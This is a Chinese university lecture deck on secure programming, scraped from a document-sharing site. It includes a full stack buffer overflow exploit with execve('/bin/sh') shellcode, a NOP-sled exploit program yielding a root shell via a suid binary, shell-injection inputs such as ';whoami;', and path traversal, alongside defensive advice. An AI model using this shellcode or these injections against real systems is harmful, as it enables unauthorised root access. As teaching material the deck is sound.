版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
网络与信息安全
第十五讲
安全程序设计
唐礼勇
北京大学信息科学技术学院
软件研究所-信息安全研究室
tly@
2003年春季北京大学硕士研究生课程现实中的一些安全问题现实中的一些安全问题我的口令就是我的用户名后加上123现实中的一些安全问题我的口令就是我的用户名后加上123我的口令是Q47pY!3,每隔90天就更换一次现实中的一些安全问题强而有效的不可破解的加密技术随处均可得
到(尽管有各种各样的进出口限制)不攻击加密技术,攻击其应用的底层基础设施不攻击加密技术,攻击其实现不攻击加密技术,而从用户方面入手WhySecurityisHarderthanitLooks所有软件都是有错的通常情况下99.99%无错的程序很少会出问题同安全相关的99.99%无错的程序可以确信会被人利用那0.01%的错误0.01%安全问题等于100%的失败从几个程序谈起BurningyourselfwithmaliciousdataSegmentationFault(coredumped)程序运行平台RedhatLinux8.0Kernel2.4.18GNUgcc3.2第一个程序#include<stdio.h>#include<string.h>voidSayHello(char*name){chartmpName[80];strcpy(tmpName,name);/*DosomechecksfortmpName.*/printf("Hello%s\n",tmpName);}intmain(intargc,char**argv){if(argc!=2){printf("Usage:hello<name>.\n");return1;}SayHello(argv[1]);return0;}
hello.c运行情况$./hellocomputerHellocomputer
hello.c运行情况$./hellocomputerHellocomputer$./helloaaaa………….aHelloaaaa……………….aSegmentationfault(coredumped)
hello.c运行情况$./hellocomputerHellocomputer$./helloaaaa………….aHelloaaaa……………….aSegmentationfault(coredumped)
hello.cWhy????检查一下程序#include<stdio.h>#include<string.h>voidSayHello(char*name){
chartmpName[80];
strcpy(tmpName,name);/*DosomechecksfortmpName.*/printf("Hello%s\n",tmpName);}intmain(intargc,char**argv){if(argc!=2){printf("Usage:hello<name>.\n");return1;}SayHello(argv[1]);return0;}
hello.c进一步思考……发生了什么事?几个要点Linux及其它几乎所有Intelx86系统、Solaris,etc分页式存储管理平面内存结构,4GB或更大逻辑地址空间栈从下往上生长C语言不进行边界检查进程内存布局代码区数据区堆栈段字符串向下生长栈段向上生长0x000000000xFFFFFFFF调用SayHello之前的栈main函数局部变量区lastfpretipargcargvenv…...ESPmain栈帧进入SayHello后的栈tmpName[80]main-fpretipnamemain栈帧…...ESPSayHello栈帧准备退出SayHello的栈(情况1)computer.
…………..main-fpretipnamemain栈帧…...ESPSayHello栈帧main中return0;./hellocomputer准备退出SayHello的栈(情况2)aaaaaaaaaaaaaaaaaa……aaaaaaaa0x616161610x616161610x61616161main栈帧…...ESPSayHello栈帧retip???????./helloaaaaaa……………….a如果精心选择数据……...如果精心选择数据……...ESPSayHello栈帧retip如果精心选择数据……...???????????????????………..????0x????????0xNNNNNNNN0x????????………...………...………...ESPSayHello栈帧retip0xNNNNNNNN如果精心选择数据……...???????????????????………..????0x????????0xNNNNNNNN0x????????………...………...Our-CodesESPSayHello栈帧retip0xNNNNNNNN如何选择这些数据?几个问题:SayHello函数局部变量区大小?如何选择这些数据?几个问题:SayHello函数局部变量区大小?NNNNNNNN如何确定?如何选择这些数据?几个问题:SayHello函数局部变量区大小?NNNNNNNN如何确定?Ourcodes该怎样写如何选择这些数据?几个问题:SayHello函数局部变量区大小?NNNNNNNN如何确定?Ourcodes该怎样写输入缓冲区不能包含0局部变量区问题???????????????????………..????0x????????0xNNNNNNNN0x????????………...………...Our-CodesESPSayHello栈帧retip0xNNNNNNNN局部变量区问题0xNNNNNNNN………..NNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNNOur-CodesESPSayHello栈帧retip0xNNNNNNNN代码起始地址如何确定?0xNNNNNNNN………..NNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNNOur-CodesESPSayHello栈帧retip0xNNNNNNNN<4K代码起始地址如何确定问题已转化为用ESP加上某一偏移代码起始地址如何确定问题已转化为用ESP加上某一偏移该偏移不需要精确为什么偏移不需要精确?0xNNNNNNNN………..NNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNN0xNNNNNNNN……….NNNNNNOPNOP……..NOPReal-CodesESPSayHello栈帧retip0xNNNNNNNN代码起始地址如何确定问题已转化为用ESP加上某一偏移该偏移不需要精确ESP如何确定呢代码起始地址如何确定问题已转化为用ESP加上某一偏移该偏移不需要精确ESP如何确定呢用同样选项,插入一段代码,重新编译代码起始地址如何确定问题已转化为用ESP加上某一偏移该偏移不需要精确ESP如何确定呢用同样选项,插入一段代码,重新编译使用调试工具跟踪应用程序代码起始地址如何确定问题已转化为用ESP加上某一偏移该偏移不需要精确ESP如何确定呢用同样选项,插入一段代码,重新编译使用调试工具跟踪应用程序编一小程序,打印出运行时栈顶位置代码起始地址如何确定问题已转化为用ESP加上某一偏移该偏移不需要精确ESP如何确定呢用同样选项,插入一段代码,重新编译使用调试工具跟踪应用程序编一小程序,打印出运行时栈顶位置在同样环境下,不同进程之间栈位置距离不会太远植入代码如何编写植入代码如何编写 jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0植入代码如何编写
jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0植入代码如何编写 jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0植入代码如何编写 jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0
esi==cmd植入代码如何编写 jmp label2label1: pop esi
mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0
esi==cmd植入代码如何编写 jmp label2label1: pop esi
mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0esi+8: cmd
esi==cmd植入代码如何编写 jmp label2label1: pop esi mov [esi+8],esi
xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0esi+8: cmd
esi==cmd植入代码如何编写 jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al
mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0esi+8: cmd
esi==cmd植入代码如何编写 jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al
mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0esi+8: cmd,0
esi==cmd植入代码如何编写 jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax
mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0esi+8: cmd,0
esi==cmd运行程序路径命令行参数execp系统调用植入代码如何编写 jmp label2label1: pop esi mov [esi+8],esi xor eax,eax mov [esi+7],al mov [esi+12],eax mov al,0bh mov ebx,esi lea ecx,[esi+8] lea edx, [esi+12] int 80h
xor ebx,ebx mov eax,ebx inc eax int 80hlabel2: call label1cmd: db“/bin/sh”,0esi+8: cmd,0
esi==cmd_exit植入代码二进制格式charshell_code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0”“\x88\x46\x07\x89\x46\x0c\xb0\x0b""\x89\xf3\x8d\x4e\x08\x8d\x56\x0c”“\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xdc\xff\xff\xff/bin/sh";植入代码自测试程序(1)#include<string.h>unsignedcharshell_code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0”“\x88\x46\x07\x89\x46\x0c\xb0\x0b""\x89\xf3\x8d\x4e\x08\x8d\x56\x0c”“\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xdc\xff\xff\xff/bin/ls";charlarge_string[128];main(){charbuffer[96];inti;
test1.c植入代码自测试程序(2)long*long_ptr=(long*)large_string;for(i=0;i<32;i++)long_ptr[i]=(long)buffer;for(i=0;i<strlen(shell_code);i++)large_string[i]=shell_code[i];strcpy(buffer,large_string);printf("IseverythingOK?:-)\n");}
test1.c植入代码自测试程序(3)$./test1IseverythingOK?:-)
test1.c植入代码自测试程序(3)$./test1IseverythingOK?:-)hellohello.ctest1test1.c
test1.c完整的攻击hello的程序(1)#include<string.h>#include<stdlib.h>#include<unistd.h>unsignedcharshell_code[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0”“\x88\x46\x07\x89\x46\x0c\xb0\x0b""\x89\xf3\x8d\x4e\x08\x8d\x56\x0c”“\xcd\x80\x31\xdb\x89\xd8\x40\xcd""\x80\xe8\xdc\xff\xff\xff/bin/sh";#defineDEFAULT_OFFSET0#defineBUFFER_SIZE1024test2.c完整的攻击hello的程序(2)unsignedlongget_esp(){__asm__("movl%esp,%eax");}main(intargc,char**argv){char*buff;char*ptr;unsignedlong*addr_ptr;unsignedlongesp;inti,ofs;test2.c完整的攻击hello的程序(3)if(argc==1)ofs=DEFAULT_OFFSET;elseofs=atoi(argv[1]);ptr=buff=malloc(4096);/*Fillinwithaddresses*/addr_ptr=(unsignedlong*)ptr;esp=get_esp();printf("ESP=%08x\n",esp);
for(i=0;i<100;i++)*(addr_ptr++)=esp+ofs;test2.c完整的攻击hello的程序(4)/*FillthestartofshellbufferwithNOPs*/ptr=(char*)addr_ptr;
memset(ptr,'A',BUFFER_SIZE-strlen(shell_code));ptr+=BUFFER_SIZE-strlen(shell_code);/*Andthentheshellcode*/memcpy(ptr,shell_code,strlen(shell_code));ptr+=strlen(shell_code);*ptr=0;printf("IseverythingOK?:-)\n");execl("./hello","hello",buff,NULL);}test2.c完整的攻击hello的程序(4)/*FillthestartofshellbufferwithNOPs*/ptr=(char*)addr_ptr;memset(ptr,'A',BUFFER_SIZE-strlen(shell_code));ptr+=BUFFER_SIZE-strlen(shell_code);/*Andthentheshellcode*/
memcpy(ptr,shell_code,strlen(shell_code));ptr+=strlen(shell_code);*ptr=0;printf("IseverythingOK?:-)\n");execl("./hello","hello",buff,NULL);}test2.c完整的攻击hello的程序(4)/*FillthestartofshellbufferwithNOPs*/ptr=(char*)addr_ptr;memset(ptr,'A',BUFFER_SIZE-strlen(shell_code));ptr+=BUFFER_SIZE-strlen(shell_code);/*Andthentheshellcode*/memcpy(ptr,shell_code,strlen(shell_code));ptr+=strlen(shell_code);*ptr=0;printf("IseverythingOK?:-)\n");
execl("./hello","hello",buff,NULL);}test2.c完整的攻击hello的程序(5)<tly:~/tttt/tt>$./test2ESP=bffffcd0IseverythingOK?:-)Hello<一堆乱码>/bin/shtest2.c完整的攻击hello的程序(5)<tly:~/tttt/tt>$./test2ESP=bffffcd0IseverythingOK?:-)Hello<一堆乱码>/bin/shbash$_test2.c完整的攻击hello的程序(5)<tly:~/tttt/tt>$./test2ESP=bffffcd0IseverythingOK?:-)Hello<一堆乱码>/bin/shbash$_test2.c完整的攻击hello的程序(5)<tly:~/tttt/tt>$./test2ESP=bffffcd0IseverythingOK?:-)Hello<一堆乱码>/bin/shbash$bash$whoamitlybash$_test2.c得出的结论一个程序当没有很好地检查边界条件时可能会受到缓冲区溢出攻击。有缓冲区溢出漏洞的程序当它能以特权用户身份运行时,可能让普通用户无需经过认证就可以获得系统特权。rootexploitRemoterootexploit通过网络,不需认证即可获得root权限Localrootexploit本地普通用户,利用系统程序的漏洞获得root权限哪些程序将以特权用户身份运行网络服务程序HTTPServer、FTPServer、MailServer,etcsyslogTrojian木马程序suid/sgid程序suid/sgid程序Unix一项特殊技术,使普通用户也能做只有超级用户才能执行的任务passwd、at、crontab、ping普通rwx之上加上s位,kernel在载入进程映象时自动将进程有效用户/组标识置为映象文件文件属主/组例:ls-l/usr/bin/passwd-r-s--x--x1root/usr/bin/passwd还是攻击hello的例子<tly:~/tttt/tt>$subash#chownroot:roothellobash#chmodu+shello;exit<tly:~/tttt/tt>$_还是攻击hello的例子<tly:~/tttt/tt>$subash#chownroot:roothellobash#chmodu+shello;exit<tly:~/tttt/tt>$./test2ESP=bffffcd0IseverythingOK?:-)Hello<一堆乱码>/bin/sh还是攻击hello的例子<tly:~/tttt/tt>$subash#chownroot:roothellobash#chmodu+shello;exit<tly:~/tttt/tt>$./test2ESP=bffffcd0IseverythingOK?:-)Hello<一堆乱码>/bin/shbash#_还是攻击hello的例子<tly:~/tttt/tt>$subash#chownroot:roothellobash#chmodu+shello;exit<tly:~/tttt/tt>$./test2ESP=bffffcd0IseverythingOK?:-)Hello<一堆乱码>/bin/shbash#bash#whoamirootbash#_近几年出现过的bufferoverflows
splitvt,syslog,mount/umount,sendmail,lpr,bind,gethostbyname(),modstat,cron,login,sendmailagain,thequeryCGIscript,newgrp,AutoSoftsRTSinventorycontrolsystem,host,talkd,getopt(),sendmailyetagain,FreeBSD’scrt0.c,WebSite1.1,rlogin,term,ffbconfig,libX11,passwd/yppasswd/nispasswd,imapd,ipop3d,SuperProbe,lpd,xterm,eject,lpdagain,host,mount,theNLSlibrary,xlock,libXtandfurtherX11R6libraries,talkd,fdformat,eject,elm,cxterm,ps,fbconfig,metamail,dtterm,df,anentirerangeofSGIprograms,psagain,chkey,libX11,suidperl,libXtagain,lquerylv,getopt()again,dtaction,at,libDtSvc,eeprom,lpryetagain,smbmount,xlockyetagain,MH-6.83,NIS+,ordist,xlockagain,psagain,bash,rdist,login/scheme,libX11again,sendmailforWindowsNT,wm,wwwcount,tgetent(),xdat,termcap,portmir,writesrv,rcp,opengroup,telnetd,rlogin,MSIE,eject,df,statd,atagain,rloginagain,rsh,ping,traceroute,Cisco7xxrouters,xscreensaver,passwd,deliver,cidentd,Xserver,theYappconferencingserver,multipleproblemsintheWindows95/NTNTFTPclient,theWindowsWarandServ-UFTPdaemon,theLinuxdynamiclinker,filter(partofelm-2.4),theIMailPOP3serverforNT,pset,rpc.nisd,Sambaserver,ufsrestore,DCEsecd,pine,dslip,RealPlayer,SLMail,socks5,CSMProxy,imapd(again),OutlookExpress,NetscapeMail,mutt,MSIE,LotusNotes,MSIEagain,libauth,login,iwsh,permissions,unfsd,Minicom,nslookup,zpop,dig,WebCam32,smbclient,compress,elvis,lha,bash,jidentd,Tooltalk,ttdbserver,dbadmin,zgv,mountd,pcnfs,NovellGroupwise,mscreen,xterm,Xawlibrary,CiscoIOS,muttagain,ospf_monitor,sdtcm_convert,Netscape(allversions),mpg123,Xprt,klogd,catdoc,junkbuster,SerialPOP,andrdist,……………….怎么解决?更为小心的程序设计将安全相关的功能隔离到仔细检查的代码内怎么解决?更为小心的程序设计将安全相关的功能隔离到仔细检查的代码内让栈不可运行会导致若干技术难题怎么解决?更为小心的程序设计将安全相关的功能隔离到仔细检查的代码内让栈不可运行会导致若干技术难题基于编译器的方法在代码内自动增加边界检查(veryslow)运行过程中进行栈完整性检查(slightslowdown)VisualStudio.Net:cl/GSImmunix:StackGuard重新排列栈变量(noslowdown)程序失败的其它例子程序失败的其它例子传递参数到其它进程程序失败的其它例子传递参数到其它进程其它类型输入程序失败的其它例子传递参数到其它进程其它类型输入
Racecondition程序失败的其它例子传递参数到其它进程其它类型输入
Racecondition
会话密钥的生成程序失败的其它例子传递参数到其它进程其它类型输入
Racecondition
会话密钥的生成内存数据保护程序失败的其它例子传递参数到其它进程其它类型输入
Racecondition
会话密钥的生成内存数据保护
最小特权传参数给其它进程的几种类型传参数给其它进程的几种类型Unixshellscripts传参数给其它进程的几种类型UnixshellscriptsCGI/Perlscripts传参数给其它进程的几种类型UnixshellscriptsCGI/Perlscripts很复杂的应用sendmail传参数给其它进程的几种类型UnixshellscriptsCGI/Perlscripts很复杂的应用sendmail其它类型TCPWrapperinetd又一个有问题的程序#!/bin/shecho"What'syourname?"readnameevalechoHello$nameechoNicetomeetyou!echoGoodbye!hellod运行情况$./hellodWhat’syournameMickyHelloMickyNicetomeetyouGoodbyehellod运行情况(续)$./hellodWhat’syournameMicky;ls;HelloMickyhellod运行情况(续)$./hellodWhat’syournameMicky;ls;HelloMickycsis-overflow.tar.gzhellohello.chellodtest1test1.ctest2test2.cNicetomeetyou!Goodbye!hellod运行情况(续)$./hellodWhat’syournameMicky;ls;HelloMickycsis-overflow.tar.gzhellohello.chellodtest1test1.ctest2test2.cNicetomeetyou!Goodbye!hellod问题何在?#!/bin/shecho"What'syourname?"readnameevalechoHello$nameechoNicetomeetyou!echoGoodbye!hellod假如此程序上网$ln-s`pwd`/hellod/usr/sbin$vi/etc/inetd.conf增加下面一行:2000streamtcpnowaitroot/usr/sbin/tcpdhellod$su#killall-HUPinetd/etc/inetd.conf正常情况下的结果$telnetlocalhost2000Trying...Connectedtolocalhost.Escapecharacteris'^]'.What'syourname?MickyHelloMickyNicetomeetyou!Goodbye!Connectionclosedbyforeignhost.网络上的hellod再来捣捣乱$telnetlocalhost2000Trying...Connectedtolocalhost.Escapecharacteris'^]'.What'syourname?Micky;whoami;HelloMicky网络上的hellod再来捣捣乱$telnetlocalhost2000Trying...Connectedtolocalhost.Escapecharacteris'^]'.What'syourname?Micky;whoami;HelloMickyroot:commandnotfoundNicetomeetyou!Goodbye!Connectionclosedbyforeignhost.网络上的hellod再来捣捣乱$telnetlocalhost2000Trying...Connectedtolocalhost.Escapecharacteris'^]'.What'syourname?Micky;whoami;HelloMickyroot:commandnotfoundNicetomeetyou!Goodbye!Connectionclosedbyforeignhost.网络上的hellod也是输入(DNS)早期的TCPWrapperhosts.deny@%h:替换为client机器名或IP(反向解析失败时)问题:当0被解析为>/etc/passwd时,会发生什么?ALL:.bad.domain:finger-l@%h|/usr/ucb/mailroot其它类型输入其它类型输入IIS3.0以前GET../../其它类型输入IIS3.0以前GET../../Windows奇怪的目录名解析C:\TEMP\t1\t2\t3\t4\t5\t6>cd…….C:\TEMP>_其它类型输入(续一)子进程从父进程继承的内容进程身份uid、gid、euid、egid可能被跟踪、发信号改变其运行状态打开文件描述符环境变量IFS、LD_PRELOAD文件创建模式掩码其它类型输入(续二)子进程从父进程继承的内容(续)当前目录和根目录资源极限调度优先级可能被用于下面将要谈到的racecondition攻击内部时钟信号处理处理函数被重置但被阻塞信号仍被阻塞,被忽略信号仍被忽略如何正确处理输入如何正确处理输入原则:不要相信任何来自不可靠信息源的消息。如何正确处理输入原则:不要相信任何来自不可靠信息源的消息。字符串操作类函数不要使用strcpy、strcat、sprintf换用strncpy、strncat、snprintf不要使用gets、scanf换用read、fgets小心getenv,可能被用于缓冲区溢出如何正确处理输入(续一)字符串操作类函数(续)小心gethostbyname、gethostbyaddr某些DNS可能返回恶意地址如果可能,应该做双向查询如何正确处理输入(续一)字符串操作类函数(续)小心gethostbyname、gethostbyaddr某些DNS可能返回恶意地址如果可能,应该做双向查询运行新进程system、popen、exec将产生新shell,可能做系统不希望它做的事换用execl或execv,对传递数据作严格一致性检查(sanitycheck)CreateProcess(NULL,"C:\ProgramFiles\foo",...)如何正确处理输入(续二)命令行检查程序中应仔细检查每一参数尤其是以很高特权运行的程序如何正确处理输入(续二)命令行检查程序中应仔细检查每一参数尤其是以很高特权运行的程序数据检查正确的方法:只允许可以确信没有问题的数据通过,如字母、数字、点及一些符号错误的方法:除已知会出问题的数据外都允许通过。可能会有漏网之鱼。例:随早期Apachewebserver的php.cgi就忘了过滤回车符RaceCondition多任务环境下,利用进程运行的异步性,抢占或改变进程使用资源判断资源性质与真正使用该资源之间有一个时间差,在这段时间内进程很可能运行完时间片被调度出去,此时其它进程可能改变该资源性质。RaceCondition例目的:创建并打开临时文件保证只有当前进程能打开该文件方案一#defineTMP_FILE“/tmp/_file”sprintf(tmpFile,“%s%05d.dat”,TMP_FILE,getpid());fd=open(tmpFile,O_RDWR|O_CREAT|O_TRUNC,0600);存在的问题:1.若tmpFile已存在,怎么办?2.若tmpFile为一符号链接,怎么办?方案一#defineTMP_FILE“/tmp/_file”sprintf(tmpFile,“%s%05d.dat”,TMP_FILE,getpid());fd=open(tmpFile,O_RDWR|O_CREAT|O_EXCL|O_TRUNC,0600);方案二chartmpTemplate[]=“/tmp/_fileXXXXXX”tmpFile=mktemp(tmpTemplate);if(!tmpFile){Error(“Error”);exit(-1);}fd=open(tmpFile,O_RDWR|O_CREAT|O_EXCL|O_TRUNC,0600);方案二
chartmpTemplate[]=“/tmp/_fileXXXXXX”tmpFile=mktemp(tmpTemplate);if(!tmpFile){Error(“Error”);exit(-1);}fd=open(tmpFile,O_RDWR|O_CREAT|O_EXCL|O_TRUNC,0600);需要加一循环方案三chartmpTemplate[]=“/tmp/_fileXXXXXX”fd=mkstemp(tmpTemplate);if(fd<0){Error(“Error”);exit(-1);}会话密钥的生成生成会话密钥需要大量不可预测的随机数在PC上生成随机数非常困难大多数人的动作行为是不可预测的用户输入可能是不可预测的,但对独立服务器来说很难利用。会话密钥的生成生成会话密钥需要大量不可预测的随机数在PC上生成随机数非常困难大多数人的动作行为是不可预测的用户输入可能是不可预测的,但对独立服务器来说很难利用。通常情况下实现由应用开发者处理但开发者的实现大多有误一些有问题的随机数生成器Netscape(原)a=mixbits(time.tv_usec);b=mixbits(getpid()+time.tv_sec+(getppid()<<12);seed=MD5(a,b);nonce=MD5(seed++);key=MD5(seed++);一些有问题的随机数生成器(续)KerberosV4srandom(time.tv_usec^time.tv_sec^getpid()
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 2024年度工程验收检测合同2篇
- 个人挖掘机租赁合同简单版
- 民宿承包经营合同1
- 2024年度智能手机制造合作框架合同
- 劳务外包合同 印花税 2篇
- 手房买卖合同补充协议
- 空调维保协议范本 完整版范文
- 2024版工程地质勘探安全规范合同
- 《工程造价习题》课件
- 难忘的第一次课件
- 健康评估练习题大全(含答案)
- 校车驾驶人安全教育培训知识
- 私家车安全教育课件
- 企业安全生产风险评估与等级划分
- 《管制刀具认定》课件
- 2024年中国联通黑龙江省分公司招聘笔试参考题库含答案解析
- 设立认证服务公司组建方案
- 物业团队职业素养培训
- 2023年涂料调色工程师年度总结及下年工作展望
- 政府机关办公楼物业管理服务方案三篇
- 2023年10月民航东北空管局届通导气象设备-气象-基建-财务岗位人员招考聘用18人笔试历年高频考点(难、易错点荟萃)附带答案详解
评论
0/150
提交评论